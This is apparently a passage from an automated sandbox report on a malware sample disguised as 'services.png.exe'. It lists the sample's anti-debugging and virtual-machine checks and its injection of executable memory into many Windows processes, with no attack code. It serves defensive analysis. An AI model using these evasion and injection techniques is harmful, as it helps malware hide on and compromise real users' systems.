Source: explorer.exe, 00000006.00000000.1755557906.000000000CA7C000.00000004.00000001.00020000.00000000.sdmp	Binary or memory string: \\?\STORAGE#Volume#{a33c735c-61ca-11ee-8c18-806e6f6e6963}#0000000000100000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{a33c735c-61ca-11ee-8c18-806e6f6e6963}#0000000006500000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{a33c735c-61ca-11ee-8c18-806e6f6e6963}#0000000C5E500000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{a33c735c-61ca-11ee-8c18-806e6f6e6963}#0000000007500000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#4&224f42ef&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\SCSI#CdRom&Ven_Msft&Prod_Virtual_DVD-ROM#2&1f4adffe&0&000001#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}wwwwwwwwwwwwwwwwvvvvvvvvvvvvvvvvvvvvuuuuuuuuuuuuuuuu@my
Source: SearchApp.exe, 0000000A.00000000.1871879323.0000024B55466000.00000004.00000001.00020000.00000000.sdmp	Binary or memory string: lyncvmwareonenoteneroXK
Source: SearchApp.exe, 0000000A.00000003.1893666557.0000024B4223E000.00000004.00000001.00020000.00000000.sdmp	Binary or memory string: 386\|vmware vsphere client\|vspe6388
Source: SearchApp.exe, 0000000A.00000003.1893666557.0000024B4223E000.00000004.00000001.00020000.00000000.sdmp	Binary or memory string: 8E}\DGIT\Dan\|vmware vsphere client\|vcenter5038
Source: SearchApp.exe, 0000000A.00000003.1884130039.0000024B5A435000.00000004.00000001.00020000.00000000.sdmp	Binary or memory string: \|vmware vsphere client\|vcenter5038
Source: explorer.exe, 00000006.00000002.2933946089.0000000001240000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: SCSI\DISK&VEN_VMWARE&PROD_VIRTUAL_DISK\4&1656F219&0&000000

Source: C:\Users\user\Desktop\services.png.exe	API call chain: ExitProcess graph end node	graph_0-50345
Source: C:\Users\user\Desktop\services.png.exe	API call chain: ExitProcess graph end node	graph_0-49984
Source: C:\Users\user\Desktop\services.png.exe	API call chain: ExitProcess graph end node	graph_0-49451
Source: C:\Users\user\AppData\Roaming\Azockavulie\nyheukpo.exe	API call chain: ExitProcess graph end node	graph_1-26842
Source: C:\Users\user\AppData\Roaming\Azockavulie\nyheukpo.exe	API call chain: ExitProcess graph end node	graph_1-27141

Source: C:\Users\user\Desktop\services.png.exe

Process information queried: ProcessInformation

Jump to behavior

Source: C:\Users\user\Desktop\services.png.exe

0_2_004263F3

Source: C:\Windows\System32\sihost.exe

Code function: 2_2_000001CD438BD2A4 RtlCaptureContext,RtlLookupFunctionEntry,RtlVirtualUnwind,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,

2_2_000001CD438BD2A4

Source: C:\Users\user\Desktop\services.png.exe

Code function: 0_2_00421A5A LoadLibraryW,GetProcAddress,FreeLibrary,

0_2_00421A5A

Source: C:\Users\user\Desktop\services.png.exe	Code function: 0_2_0041ED2B mov edx, dword ptr fs:[00000030h]	0_2_0041ED2B
Source: C:\Users\user\Desktop\services.png.exe	Code function: 0_2_0282ED2B mov edx, dword ptr fs:[00000030h]	0_2_0282ED2B
Source: C:\Users\user\AppData\Roaming\Azockavulie\nyheukpo.exe	Code function: 1_2_0041ED2B mov edx, dword ptr fs:[00000030h]	1_2_0041ED2B

Source: C:\Users\user\Desktop\services.png.exe

Code function: 0_2_0041F09D CreateThread,GetModuleHandleW,GetModuleHandleW,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,HeapCreate,GetProcessHeap,InitializeCriticalSection,WSAStartup,GetCommandLineW,Sleep,CreateEventW,GetLengthSid,GetCurrentProcessId,

0_2_0041F09D

Source: C:\Windows\System32\sihost.exe	Code function: 2_2_000001CD438BD2A4 RtlCaptureContext,RtlLookupFunctionEntry,RtlVirtualUnwind,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,	2_2_000001CD438BD2A4
Source: C:\Windows\System32\sihost.exe	Code function: 2_2_000001CD438B7D90 IsProcessorFeaturePresent,RtlCaptureContext,RtlLookupFunctionEntry,RtlVirtualUnwind,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,	2_2_000001CD438B7D90
Source: C:\Windows\System32\svchost.exe	Code function: 3_2_00000151A6567D90 IsProcessorFeaturePresent,RtlCaptureContext,RtlLookupFunctionEntry,RtlVirtualUnwind,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,	3_2_00000151A6567D90
Source: C:\Windows\System32\svchost.exe	Code function: 3_2_00000151A656D2A4 RtlCaptureContext,RtlLookupFunctionEntry,RtlVirtualUnwind,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,	3_2_00000151A656D2A4
Source: C:\Windows\System32\svchost.exe	Code function: 4_2_0000019E29CFD2A4 RtlCaptureContext,RtlLookupFunctionEntry,RtlVirtualUnwind,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,	4_2_0000019E29CFD2A4
Source: C:\Windows\System32\svchost.exe	Code function: 4_2_0000019E29CF7D90 IsProcessorFeaturePresent,RtlCaptureContext,RtlLookupFunctionEntry,RtlVirtualUnwind,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,	4_2_0000019E29CF7D90
Source: C:\Windows\System32\ctfmon.exe	Code function: 5_2_000001F28B4ED2A4 RtlCaptureContext,RtlLookupFunctionEntry,RtlVirtualUnwind,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,	5_2_000001F28B4ED2A4
Source: C:\Windows\System32\ctfmon.exe	Code function: 5_2_000001F28B4E7D90 IsProcessorFeaturePresent,RtlCaptureContext,RtlLookupFunctionEntry,RtlVirtualUnwind,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,	5_2_000001F28B4E7D90
Source: C:\Windows\System32\ctfmon.exe	Code function: 5_2_000001F28B54D2A4 RtlCaptureContext,RtlLookupFunctionEntry,RtlVirtualUnwind,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,	5_2_000001F28B54D2A4
Source: C:\Windows\System32\ctfmon.exe	Code function: 5_2_000001F28B547D90 IsProcessorFeaturePresent,RtlCaptureContext,RtlLookupFunctionEntry,RtlVirtualUnwind,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,	5_2_000001F28B547D90
Source: C:\Windows\explorer.exe	Code function: 6_2_09077D90 IsProcessorFeaturePresent,RtlCaptureContext,RtlLookupFunctionEntry,RtlVirtualUnwind,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,	6_2_09077D90
Source: C:\Windows\explorer.exe	Code function: 6_2_0907D2A4 RtlCaptureContext,RtlLookupFunctionEntry,RtlVirtualUnwind,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,	6_2_0907D2A4
Source: C:\Windows\System32\svchost.exe	Code function: 7_2_00000221D596D2A4 RtlCaptureContext,RtlLookupFunctionEntry,RtlVirtualUnwind,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,	7_2_00000221D596D2A4
Source: C:\Windows\System32\svchost.exe	Code function: 7_2_00000221D5967D90 IsProcessorFeaturePresent,RtlCaptureContext,RtlLookupFunctionEntry,RtlVirtualUnwind,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,	7_2_00000221D5967D90
Source: C:\Windows\System32\RuntimeBroker.exe	Code function: 9_2_000001ECFC697D90 IsProcessorFeaturePresent,RtlCaptureContext,RtlLookupFunctionEntry,RtlVirtualUnwind,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,	9_2_000001ECFC697D90
Source: C:\Windows\System32\RuntimeBroker.exe	Code function: 9_2_000001ECFC69D2A4 RtlCaptureContext,RtlLookupFunctionEntry,RtlVirtualUnwind,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,	9_2_000001ECFC69D2A4
Source: C:\Windows\System32\RuntimeBroker.exe	Code function: 14_2_000001D178747D90 IsProcessorFeaturePresent,RtlCaptureContext,RtlLookupFunctionEntry,RtlVirtualUnwind,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,	14_2_000001D178747D90
Source: C:\Windows\System32\RuntimeBroker.exe	Code function: 14_2_000001D17874D2A4 RtlCaptureContext,RtlLookupFunctionEntry,RtlVirtualUnwind,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,	14_2_000001D17874D2A4
Source: C:\Windows\System32\RuntimeBroker.exe	Code function: 14_2_000001D1787A7D90 IsProcessorFeaturePresent,RtlCaptureContext,RtlLookupFunctionEntry,RtlVirtualUnwind,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,	14_2_000001D1787A7D90
Source: C:\Windows\System32\RuntimeBroker.exe	Code function: 14_2_000001D1787AD2A4 RtlCaptureContext,RtlLookupFunctionEntry,RtlVirtualUnwind,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,	14_2_000001D1787AD2A4
Source: C:\Windows\System32\RuntimeBroker.exe	Code function: 17_2_0000023B6120D2A4 RtlCaptureContext,RtlLookupFunctionEntry,RtlVirtualUnwind,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,	17_2_0000023B6120D2A4
Source: C:\Windows\System32\RuntimeBroker.exe	Code function: 17_2_0000023B61207D90 IsProcessorFeaturePresent,RtlCaptureContext,RtlLookupFunctionEntry,RtlVirtualUnwind,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,	17_2_0000023B61207D90
Source: C:\Windows\System32\RuntimeBroker.exe	Code function: 17_2_0000023B6126D2A4 RtlCaptureContext,RtlLookupFunctionEntry,RtlVirtualUnwind,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,	17_2_0000023B6126D2A4
Source: C:\Windows\System32\RuntimeBroker.exe	Code function: 17_2_0000023B61267D90 IsProcessorFeaturePresent,RtlCaptureContext,RtlLookupFunctionEntry,RtlVirtualUnwind,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,	17_2_0000023B61267D90
Source: C:\Windows\System32\RuntimeBroker.exe	Code function: 18_2_000002135E7ED2A4 RtlCaptureContext,RtlLookupFunctionEntry,RtlVirtualUnwind,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,	18_2_000002135E7ED2A4
Source: C:\Windows\System32\RuntimeBroker.exe	Code function: 18_2_000002135E7E7D90 IsProcessorFeaturePresent,RtlCaptureContext,RtlLookupFunctionEntry,RtlVirtualUnwind,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,	18_2_000002135E7E7D90
Source: C:\Windows\System32\ApplicationFrameHost.exe	Code function: 19_2_000001F6E8187D90 IsProcessorFeaturePresent,RtlCaptureContext,RtlLookupFunctionEntry,RtlVirtualUnwind,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,	19_2_000001F6E8187D90
Source: C:\Windows\System32\ApplicationFrameHost.exe	Code function: 19_2_000001F6E818D2A4 RtlCaptureContext,RtlLookupFunctionEntry,RtlVirtualUnwind,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,	19_2_000001F6E818D2A4

HIPS / PFW / Operating System Protection Evasion

Allocates memory in foreign processes

Source: C:\Users\user\Desktop\services.png.exe	Memory allocated: C:\Windows\SysWOW64\cmd.exe base: 2960000 protect: page execute and read and write	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Azockavulie\nyheukpo.exe	Memory allocated: C:\Windows\System32\sihost.exe base: AC0000 protect: page execute and read and write	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Azockavulie\nyheukpo.exe	Memory allocated: C:\Windows\System32\svchost.exe base: 910000 protect: page execute and read and write	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Azockavulie\nyheukpo.exe	Memory allocated: C:\Windows\System32\svchost.exe base: 9A0000 protect: page execute and read and write	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Azockavulie\nyheukpo.exe	Memory allocated: C:\Windows\System32\ctfmon.exe base: A50000 protect: page execute and read and write	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Azockavulie\nyheukpo.exe	Memory allocated: C:\Windows\explorer.exe base: C350000 protect: page execute and read and write	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Azockavulie\nyheukpo.exe	Memory allocated: C:\Windows\System32\svchost.exe base: D40000 protect: page execute and read and write	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Azockavulie\nyheukpo.exe	Memory allocated: C:\Windows\SystemApps\Microsoft.Windows.StartMenuExperienceHost_cw5n1h2txyewy\StartMenuExperienceHost.exe base: B50000 protect: page execute and read and write	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Azockavulie\nyheukpo.exe	Memory allocated: C:\Windows\System32\RuntimeBroker.exe base: 110000 protect: page execute and read and write	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Azockavulie\nyheukpo.exe	Memory allocated: C:\Windows\SystemApps\Microsoft.Windows.Search_cw5n1h2txyewy\SearchApp.exe base: A90000 protect: page execute and read and write	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Azockavulie\nyheukpo.exe	Memory allocated: C:\Windows\System32\RuntimeBroker.exe base: AB0000 protect: page execute and read and write	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Azockavulie\nyheukpo.exe	Memory allocated: C:\Windows\System32\smartscreen.exe base: 290000 protect: page execute and read and write	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Azockavulie\nyheukpo.exe	Memory allocated: C:\Windows\SystemApps\MicrosoftWindows.Client.CBS_cw5n1h2txyewy\TextInputHost.exe base: 580000 protect: page execute and read and write	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Azockavulie\nyheukpo.exe	Memory allocated: C:\Windows\System32\RuntimeBroker.exe base: 3D0000 protect: page execute and read and write	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Azockavulie\nyheukpo.exe	Memory allocated: C:\Windows\System32\RuntimeBroker.exe base: 900000 protect: page execute and read and write	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Azockavulie\nyheukpo.exe	Memory allocated: C:\Windows\System32\ApplicationFrameHost.exe base: 180000 protect: page execute and read and write	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Azockavulie\nyheukpo.exe	Memory allocated: C:\Program Files\WindowsApps\Microsoft.WindowsStore_11910.1002.5.0_x64__8wekyb3d8bbwe\WinStore.App.exe base: A10000 protect: page execute and read and write	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Azockavulie\nyheukpo.exe	Memory allocated: C:\Windows\System32\RuntimeBroker.exe base: 190000 protect: page execute and read and write	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Azockavulie\nyheukpo.exe	Memory allocated: C:\Windows\ImmersiveControlPanel\SystemSettings.exe base: F10000 protect: page execute and read and write	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Azockavulie\nyheukpo.exe	Memory allocated: C:\Windows\System32\oobe\UserOOBEBroker.exe base: 10000 protect: page execute and read and write	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Azockavulie\nyheukpo.exe	Memory allocated: C:\Windows\System32\svchost.exe base: FB0000 protect: page execute and read and write	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Azockavulie\nyheukpo.exe	Memory allocated: C:\Windows\System32\dllhost.exe base: AC0000 protect: page execute and read and write	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Azockavulie\nyheukpo.exe	Memory allocated: C:\Windows\System32\conhost.exe base: 30000 protect: page execute and read and write	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Azockavulie\nyheukpo.exe	Memory allocated: C:\Windows\System32\backgroundTaskHost.exe base: E20000 protect: page execute and read and write	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Azockavulie\nyheukpo.exe	Memory allocated: C:\Windows\System32\RuntimeBroker.exe base: 810000 protect: page execute and read and write	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Azockavulie\nyheukpo.exe	Memory allocated: C:\Windows\System32\RuntimeBroker.exe base: EE0000 protect: page execute and read and write	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Azockavulie\nyheukpo.exe	Memory allocated: C:\Program Files (x86)\LdeWKZazZKfvzrGtjGuLEmITNknRAgVxStdwTQWzMvzouYILHHdXru\XRdxSzSUL8yOL.exe base: 2990000 protect: page execute and read and write	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Azockavulie\nyheukpo.exe	Memory allocated: C:\Program Files (x86)\LdeWKZazZKfvzrGtjGuLEmITNknRAgVxStdwTQWzMvzouYILHHdXru\XRdxSzSUL8yOL.exe base: 2E30000 protect: page execute and read and write	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Azockavulie\nyheukpo.exe	Memory allocated: C:\Program Files (x86)\LdeWKZazZKfvzrGtjGuLEmITNknRAgVxStdwTQWzMvzouYILHHdXru\XRdxSzSUL8yOL.exe base: 2530000 protect: page execute and read and write	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Azockavulie\nyheukpo.exe	Memory allocated: C:\Program Files (x86)\LdeWKZazZKfvzrGtjGuLEmITNknRAgVxStdwTQWzMvzouYILHHdXru\XRdxSzSUL8yOL.exe base: 2E50000 protect: page execute and read and write	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Azockavulie\nyheukpo.exe	Memory allocated: C:\Program Files (x86)\LdeWKZazZKfvzrGtjGuLEmITNknRAgVxStdwTQWzMvzouYILHHdXru\XRdxSzSUL8yOL.exe base: 2400000 protect: page execute and read and write	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Azockavulie\nyheukpo.exe	Memory allocated: C:\Program Files (x86)\LdeWKZazZKfvzrGtjGuLEmITNknRAgVxStdwTQWzMvzouYILHHdXru\XRdxSzSUL8yOL.exe base: 25D0000 protect: page execute and read and write	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Azockavulie\nyheukpo.exe	Memory allocated: C:\Program Files (x86)\LdeWKZazZKfvzrGtjGuLEmITNknRAgVxStdwTQWzMvzouYILHHdXru\XRdxSzSUL8yOL.exe base: 2CA0000 protect: page execute and read and write	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Azockavulie\nyheukpo.exe	Memory allocated: C:\Program Files (x86)\LdeWKZazZKfvzrGtjGuLEmITNknRAgVxStdwTQWzMvzouYILHHdXru\XRdxSzSUL8yOL.exe base: C90000 protect: page execute and read and write	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Azockavulie\nyheukpo.exe	Memory allocated: C:\Program Files (x86)\LdeWKZazZKfvzrGtjGuLEmITNknRAgVxStdwTQWzMvzouYILHHdXru\XRdxSzSUL8yOL.exe base: 2F50000 protect: page execute and read and write	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Azockavulie\nyheukpo.exe	Memory allocated: C:\Program Files (x86)\LdeWKZazZKfvzrGtjGuLEmITNknRAgVxStdwTQWzMvzouYILHHdXru\XRdxSzSUL8yOL.exe base: 2B30000 protect: page execute and read and write	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Azockavulie\nyheukpo.exe	Memory allocated: C:\Program Files (x86)\LdeWKZazZKfvzrGtjGuLEmITNknRAgVxStdwTQWzMvzouYILHHdXru\XRdxSzSUL8yOL.exe base: 2390000 protect: page execute and read and write	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Azockavulie\nyheukpo.exe	Memory allocated: C:\Program Files (x86)\LdeWKZazZKfvzrGtjGuLEmITNknRAgVxStdwTQWzMvzouYILHHdXru\XRdxSzSUL8yOL.exe base: 2C90000 protect: page execute and read and write	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Azockavulie\nyheukpo.exe	Memory allocated: C:\Program Files (x86)\LdeWKZazZKfvzrGtjGuLEmITNknRAgVxStdwTQWzMvzouYILHHdXru\XRdxSzSUL8yOL.exe base: 29E0000 protect: page execute and read and write	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Azockavulie\nyheukpo.exe	Memory allocated: C:\Program Files (x86)\LdeWKZazZKfvzrGtjGuLEmITNknRAgVxStdwTQWzMvzouYILHHdXru\XRdxSzSUL8yOL.exe base: 24E0000 protect: page execute and read and write	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Azockavulie\nyheukpo.exe	Memory allocated: C:\Program Files (x86)\LdeWKZazZKfvzrGtjGuLEmITNknRAgVxStdwTQWzMvzouYILHHdXru\XRdxSzSUL8yOL.exe base: 1640000 protect: page execute and read and write	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Azockavulie\nyheukpo.exe	Memory allocated: C:\Program Files (x86)\LdeWKZazZKfvzrGtjGuLEmITNknRAgVxStdwTQWzMvzouYILHHdXru\XRdxSzSUL8yOL.exe base: 2CC0000 protect: page execute and read and write	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Azockavulie\nyheukpo.exe	Memory allocated: C:\Program Files (x86)\LdeWKZazZKfvzrGtjGuLEmITNknRAgVxStdwTQWzMvzouYILHHdXru\XRdxSzSUL8yOL.exe base: 2310000 protect: page execute and read and write	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Azockavulie\nyheukpo.exe	Memory allocated: C:\Program Files (x86)\LdeWKZazZKfvzrGtjGuLEmITNknRAgVxStdwTQWzMvzouYILHHdXru\XRdxSzSUL8yOL.exe base: 2A50000 protect: page execute and read and write	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Azockavulie\nyheukpo.exe	Memory allocated: C:\Program Files (x86)\LdeWKZazZKfvzrGtjGuLEmITNknRAgVxStdwTQWzMvzouYILHHdXru\XRdxSzSUL8yOL.exe base: 2720000 protect: page execute and read and write	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Azockavulie\nyheukpo.exe	Memory allocated: C:\Program Files (x86)\LdeWKZazZKfvzrGtjGuLEmITNknRAgVxStdwTQWzMvzouYILHHdXru\XRdxSzSUL8yOL.exe base: 2460000 protect: page execute and read and write	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Azockavulie\nyheukpo.exe	Memory allocated: C:\Program Files (x86)\LdeWKZazZKfvzrGtjGuLEmITNknRAgVxStdwTQWzMvzouYILHHdXru\XRdxSzSUL8yOL.exe base: 2740000 protect: page execute and read and write	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Azockavulie\nyheukpo.exe	Memory allocated: C:\Program Files (x86)\LdeWKZazZKfvzrGtjGuLEmITNknRAgVxStdwTQWzMvzouYILHHdXru\XRdxSzSUL8yOL.exe base: 11B0000 protect: page execute and read and write	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Azockavulie\nyheukpo.exe	Memory allocated: C:\Program Files (x86)\LdeWKZazZKfvzrGtjGuLEmITNknRAgVxStdwTQWzMvzouYILHHdXru\XRdxSzSUL8yOL.exe base: 2EA0000 protect: page execute and read and write	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Azockavulie\nyheukpo.exe	Memory allocated: C:\Program Files (x86)\LdeWKZazZKfvzrGtjGuLEmITNknRAgVxStdwTQWzMvzouYILHHdXru\XRdxSzSUL8yOL.exe base: 2AC0000 protect: page execute and read and write	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Azockavulie\nyheukpo.exe	Memory allocated: C:\Program Files (x86)\LdeWKZazZKfvzrGtjGuLEmITNknRAgVxStdwTQWzMvzouYILHHdXru\XRdxSzSUL8yOL.exe base: 24C0000 protect: page execute and read and write	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Azockavulie\nyheukpo.exe	Memory allocated: C:\Program Files (x86)\LdeWKZazZKfvzrGtjGuLEmITNknRAgVxStdwTQWzMvzouYILHHdXru\XRdxSzSUL8yOL.exe base: 2D00000 protect: page execute and read and write	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Azockavulie\nyheukpo.exe	Memory allocated: C:\Program Files (x86)\LdeWKZazZKfvzrGtjGuLEmITNknRAgVxStdwTQWzMvzouYILHHdXru\XRdxSzSUL8yOL.exe base: 2AC0000 protect: page execute and read and write	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Azockavulie\nyheukpo.exe	Memory allocated: C:\Program Files (x86)\LdeWKZazZKfvzrGtjGuLEmITNknRAgVxStdwTQWzMvzouYILHHdXru\XRdxSzSUL8yOL.exe base: 3190000 protect: page execute and read and write	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Azockavulie\nyheukpo.exe	Memory allocated: C:\Program Files (x86)\LdeWKZazZKfvzrGtjGuLEmITNknRAgVxStdwTQWzMvzouYILHHdXru\XRdxSzSUL8yOL.exe base: 2A40000 protect: page execute and read and write	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Azockavulie\nyheukpo.exe	Memory allocated: C:\Program Files (x86)\LdeWKZazZKfvzrGtjGuLEmITNknRAgVxStdwTQWzMvzouYILHHdXru\XRdxSzSUL8yOL.exe base: 390000 protect: page execute and read and write	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Azockavulie\nyheukpo.exe	Memory allocated: C:\Program Files (x86)\LdeWKZazZKfvzrGtjGuLEmITNknRAgVxStdwTQWzMvzouYILHHdXru\XRdxSzSUL8yOL.exe base: 2C60000 protect: page execute and read and write	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Azockavulie\nyheukpo.exe	Memory allocated: C:\Program Files (x86)\LdeWKZazZKfvzrGtjGuLEmITNknRAgVxStdwTQWzMvzouYILHHdXru\XRdxSzSUL8yOL.exe base: 2970000 protect: page execute and read and write	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Azockavulie\nyheukpo.exe	Memory allocated: C:\Program Files (x86)\LdeWKZazZKfvzrGtjGuLEmITNknRAgVxStdwTQWzMvzouYILHHdXru\XRdxSzSUL8yOL.exe base: 2B20000 protect: page execute and read and write	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Azockavulie\nyheukpo.exe	Memory allocated: C:\Program Files (x86)\LdeWKZazZKfvzrGtjGuLEmITNknRAgVxStdwTQWzMvzouYILHHdXru\XRdxSzSUL8yOL.exe base: 27E0000 protect: page execute and read and write	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Azockavulie\nyheukpo.exe	Memory allocated: C:\Program Files (x86)\LdeWKZazZKfvzrGtjGuLEmITNknRAgVxStdwTQWzMvzouYILHHdXru\XRdxSzSUL8yOL.exe base: 2210000 protect: page execute and read and write	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Azockavulie\nyheukpo.exe	Memory allocated: C:\Program Files (x86)\LdeWKZazZKfvzrGtjGuLEmITNknRAgVxStdwTQWzMvzouYILHHdXru\XRdxSzSUL8yOL.exe base: 2880000 protect: page execute and read and write	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Azockavulie\nyheukpo.exe	Memory allocated: C:\Program Files (x86)\LdeWKZazZKfvzrGtjGuLEmITNknRAgVxStdwTQWzMvzouYILHHdXru\XRdxSzSUL8yOL.exe base: 11E0000 protect: page execute and read and write	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Azockavulie\nyheukpo.exe	Memory allocated: C:\Program Files (x86)\LdeWKZazZKfvzrGtjGuLEmITNknRAgVxStdwTQWzMvzouYILHHdXru\XRdxSzSUL8yOL.exe base: DA0000 protect: page execute and read and write	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Azockavulie\nyheukpo.exe	Memory allocated: C:\Program Files (x86)\LdeWKZazZKfvzrGtjGuLEmITNknRAgVxStdwTQWzMvzouYILHHdXru\XRdxSzSUL8yOL.exe base: 790000 protect: page execute and read and write	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Azockavulie\nyheukpo.exe	Memory allocated: C:\Program Files (x86)\LdeWKZazZKfvzrGtjGuLEmITNknRAgVxStdwTQWzMvzouYILHHdXru\XRdxSzSUL8yOL.exe base: 26D0000 protect: page execute and read and write	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Azockavulie\nyheukpo.exe	Memory allocated: C:\Program Files (x86)\LdeWKZazZKfvzrGtjGuLEmITNknRAgVxStdwTQWzMvzouYILHHdXru\XRdxSzSUL8yOL.exe base: 2580000 protect: page execute and read and write	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Azockavulie\nyheukpo.exe	Memory allocated: C:\Program Files (x86)\LdeWKZazZKfvzrGtjGuLEmITNknRAgVxStdwTQWzMvzouYILHHdXru\XRdxSzSUL8yOL.exe base: 2C40000 protect: page execute and read and write	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Azockavulie\nyheukpo.exe	Memory allocated: C:\Program Files (x86)\LdeWKZazZKfvzrGtjGuLEmITNknRAgVxStdwTQWzMvzouYILHHdXru\XRdxSzSUL8yOL.exe base: 25B0000 protect: page execute and read and write	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Azockavulie\nyheukpo.exe	Memory allocated: C:\Program Files (x86)\LdeWKZazZKfvzrGtjGuLEmITNknRAgVxStdwTQWzMvzouYILHHdXru\XRdxSzSUL8yOL.exe base: 2F10000 protect: page execute and read and write	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Azockavulie\nyheukpo.exe	Memory allocated: C:\Program Files (x86)\LdeWKZazZKfvzrGtjGuLEmITNknRAgVxStdwTQWzMvzouYILHHdXru\XRdxSzSUL8yOL.exe base: 700000 protect: page execute and read and write	Jump to behavior
